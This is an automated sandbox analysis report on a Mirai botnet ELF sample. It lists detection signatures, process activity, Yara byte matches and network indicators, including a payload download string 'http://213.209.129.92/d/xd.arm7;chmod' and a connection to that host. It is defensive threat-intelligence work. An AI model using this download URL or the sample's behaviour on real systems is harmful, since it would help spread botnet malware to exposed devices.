Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Linux Analysis Report
xd.x86_64.elf

Overview

General Information

Sample name:xd.x86_64.elf
Analysis ID:1654966
MD5:e59bf6760fd1be7b7fdb51b0c8038c27
SHA1:29b0741492548fc34e5c2ec6855f9240dbeb0788
SHA256:cd21516feb04d3b1fa6eac9d7db9b633d965f63fd93efaf3f6f042f894302f67
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:88
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample deletes itself
Sample is packed with UPX
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654966
Start date and time:2025-04-02 20:47:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:xd.x86_64.elf
Detection:MAL
Classification:mal88.spre.troj.evad.linELF@0/16@3/0
  • Connection to analysis system has been lost, crash info: Unknown
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: http://213.209.129.92/d/xd.arm7;chmod

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 6222, Parent: 4336)
  • rm (PID: 6222, Parent: 4336, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
  • dash New Fork (PID: 6223, Parent: 4336)
  • cat (PID: 6223, Parent: 4336, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.HvEmy83FD7
  • dash New Fork (PID: 6224, Parent: 4336)
  • head (PID: 6224, Parent: 4336, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6225, Parent: 4336)
  • tr (PID: 6225, Parent: 4336, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6226, Parent: 4336)
  • cut (PID: 6226, Parent: 4336, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6227, Parent: 4336)
  • cat (PID: 6227, Parent: 4336, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.HvEmy83FD7
  • dash New Fork (PID: 6228, Parent: 4336)
  • head (PID: 6228, Parent: 4336, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6229, Parent: 4336)
  • tr (PID: 6229, Parent: 4336, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6230, Parent: 4336)
  • cut (PID: 6230, Parent: 4336, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6231, Parent: 4336)
  • rm (PID: 6231, Parent: 4336, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.HvEmy83FD7 /tmp/tmp.9Ut2ilLg4K /tmp/tmp.o2saWRiF1e
  • systemd New Fork (PID: 6273, Parent: 1)
  • journalctl (PID: 6273, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6290, Parent: 1)
  • systemd New Fork (PID: 6293, Parent: 1)
  • systemd New Fork (PID: 6294, Parent: 1)
  • systemd New Fork (PID: 6295, Parent: 1)
  • systemd New Fork (PID: 6296, Parent: 1)
  • systemd New Fork (PID: 6334, Parent: 1)
  • systemd New Fork (PID: 6366, Parent: 1)
  • systemd New Fork (PID: 6367, Parent: 1)
  • systemd New Fork (PID: 6369, Parent: 1)
  • systemd New Fork (PID: 6372, Parent: 1)
  • systemd New Fork (PID: 6374, Parent: 1860)
  • pulseaudio (PID: 6374, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • gdm3 New Fork (PID: 6375, Parent: 1320)
  • Default (PID: 6375, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6376, Parent: 1320)
  • Default (PID: 6376, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6378, Parent: 1320)
  • Default (PID: 6378, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6381, Parent: 1)
  • gpu-manager (PID: 6381, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 6383, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6384, Parent: 6383)
      • grep (PID: 6384, Parent: 6383, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6385, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6386, Parent: 6385)
      • grep (PID: 6386, Parent: 6385, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6388, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6389, Parent: 6388)
      • grep (PID: 6389, Parent: 6388, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6391, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6392, Parent: 6391)
      • grep (PID: 6392, Parent: 6391, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6393, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6395, Parent: 6393)
      • grep (PID: 6395, Parent: 6393, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6396, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6397, Parent: 6396)
      • grep (PID: 6397, Parent: 6396, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 6399, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 6400, Parent: 6399)
      • grep (PID: 6400, Parent: 6399, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 6402, Parent: 6381, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 6403, Parent: 6402)
      • grep (PID: 6403, Parent: 6402, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 6387, Parent: 1)
  • systemd New Fork (PID: 6390, Parent: 1)
  • systemd New Fork (PID: 6394, Parent: 1)
  • systemd New Fork (PID: 6398, Parent: 1)
  • systemd New Fork (PID: 6401, Parent: 1)
  • systemd New Fork (PID: 6405, Parent: 1)
  • generate-config (PID: 6405, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 6406, Parent: 6405, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 6407, Parent: 1)
  • gdm-wait-for-drm (PID: 6407, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • gdm3 (PID: 6408, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • fusermount (PID: 6433, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • gpu-manager (PID: 6443, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6453, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6463, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6473, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 6483, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • plymouth (PID: 6493, Parent: 1, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: /bin/plymouth quit
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
6265.1.0000000000400000.0000000000415000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    6265.1.0000000000400000.0000000000415000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6265.1.0000000000400000.0000000000415000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x11ce8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11cfc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      6265.1.0000000000400000.0000000000415000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xe3c8:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      6265.1.0000000000400000.0000000000415000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xebb7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 128 entries

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      • AV Detection
      • Bitcoin Miner
      • Networking
      • System Summary
      • Data Obfuscation
      • Persistence and Installation Behavior
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • Stealing of Sensitive Information
      • Remote Access Functionality

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: xd.x86_64.elfReversingLabs: Detection: 44%
      Source: /usr/bin/pulseaudio (PID: 6374)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 6406)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: global trafficTCP traffic: 192.168.2.23:52458 -> 213.209.129.92:5466
      Source: global trafficHTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1Host: daisy.ubuntu.comAccept: */*Content-Type: application/octet-streamX-Whoopsie-Version: 0.2.69ubuntu0.3Content-Length: 164887Expect: 100-continue
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:23Jump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:0Jump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:80Jump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:81Jump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:8443Jump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)Socket: 0.0.0.0:9009Jump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 213.209.129.92
      Source: unknownTCP traffic detected without corresponding DNS query: 12.189.173.171
      Source: unknownTCP traffic detected without corresponding DNS query: 161.199.5.105
      Source: unknownTCP traffic detected without corresponding DNS query: 254.245.127.51
      Source: unknownTCP traffic detected without corresponding DNS query: 192.115.166.171
      Source: unknownTCP traffic detected without corresponding DNS query: 16.6.113.70
      Source: unknownTCP traffic detected without corresponding DNS query: 147.26.119.110
      Source: unknownTCP traffic detected without corresponding DNS query: 121.89.109.139
      Source: unknownTCP traffic detected without corresponding DNS query: 5.16.143.8
      Source: unknownTCP traffic detected without corresponding DNS query: 116.108.198.23
      Source: unknownTCP traffic detected without corresponding DNS query: 115.185.178.131
      Source: unknownTCP traffic detected without corresponding DNS query: 130.247.60.236
      Source: unknownTCP traffic detected without corresponding DNS query: 244.51.105.232
      Source: unknownTCP traffic detected without corresponding DNS query: 157.21.254.41
      Source: unknownTCP traffic detected without corresponding DNS query: 141.183.150.18
      Source: unknownTCP traffic detected without corresponding DNS query: 154.26.237.50
      Source: unknownTCP traffic detected without corresponding DNS query: 99.219.67.198
      Source: unknownTCP traffic detected without corresponding DNS query: 61.142.188.43
      Source: unknownTCP traffic detected without corresponding DNS query: 183.241.183.213
      Source: unknownTCP traffic detected without corresponding DNS query: 167.129.57.101
      Source: unknownTCP traffic detected without corresponding DNS query: 17.21.68.155
      Source: unknownTCP traffic detected without corresponding DNS query: 85.128.147.59
      Source: unknownTCP traffic detected without corresponding DNS query: 211.177.213.206
      Source: unknownTCP traffic detected without corresponding DNS query: 38.236.162.166
      Source: unknownTCP traffic detected without corresponding DNS query: 78.47.133.136
      Source: unknownTCP traffic detected without corresponding DNS query: 195.138.37.13
      Source: unknownTCP traffic detected without corresponding DNS query: 170.227.100.25
      Source: unknownTCP traffic detected without corresponding DNS query: 241.14.59.13
      Source: unknownTCP traffic detected without corresponding DNS query: 154.21.58.134
      Source: unknownTCP traffic detected without corresponding DNS query: 188.246.192.92
      Source: unknownTCP traffic detected without corresponding DNS query: 116.22.120.195
      Source: unknownTCP traffic detected without corresponding DNS query: 126.214.91.90
      Source: unknownTCP traffic detected without corresponding DNS query: 80.31.88.89
      Source: unknownTCP traffic detected without corresponding DNS query: 2.80.2.208
      Source: unknownTCP traffic detected without corresponding DNS query: 246.217.204.62
      Source: unknownTCP traffic detected without corresponding DNS query: 14.178.8.215
      Source: unknownTCP traffic detected without corresponding DNS query: 241.115.228.197
      Source: unknownTCP traffic detected without corresponding DNS query: 244.229.26.5
      Source: unknownTCP traffic detected without corresponding DNS query: 36.134.15.139
      Source: unknownTCP traffic detected without corresponding DNS query: 216.207.124.173
      Source: unknownTCP traffic detected without corresponding DNS query: 253.52.231.222
      Source: unknownTCP traffic detected without corresponding DNS query: 223.184.40.9
      Source: unknownTCP traffic detected without corresponding DNS query: 82.237.35.139
      Source: unknownTCP traffic detected without corresponding DNS query: 93.22.21.246
      Source: unknownTCP traffic detected without corresponding DNS query: 240.228.28.19
      Source: unknownTCP traffic detected without corresponding DNS query: 72.203.37.240
      Source: unknownTCP traffic detected without corresponding DNS query: 88.82.18.131
      Source: unknownTCP traffic detected without corresponding DNS query: 177.105.127.22
      Source: unknownTCP traffic detected without corresponding DNS query: 18.189.89.184
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: unknownHTTP traffic detected: POST /9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e HTTP/1.1Host: daisy.ubuntu.comAccept: */*Content-Type: application/octet-streamX-Whoopsie-Version: 0.2.69ubuntu0.3Content-Length: 164887Expect: 100-continue
      Source: xd.x86_64.elf, 6260.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6262.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6263.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6264.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6265.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6266.1.0000000000400000.0000000000415000.r-x.sdmp, xd.x86_64.elf, 6268.1.0000000000400000.0000000000415000.r-x.sdmpString found in binary or memory: http://213.209.129.92/d/xd.arm7;chmod
      Source: xd.x86_64.elfString found in binary or memory: http://upx.sf.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37606 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37606
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
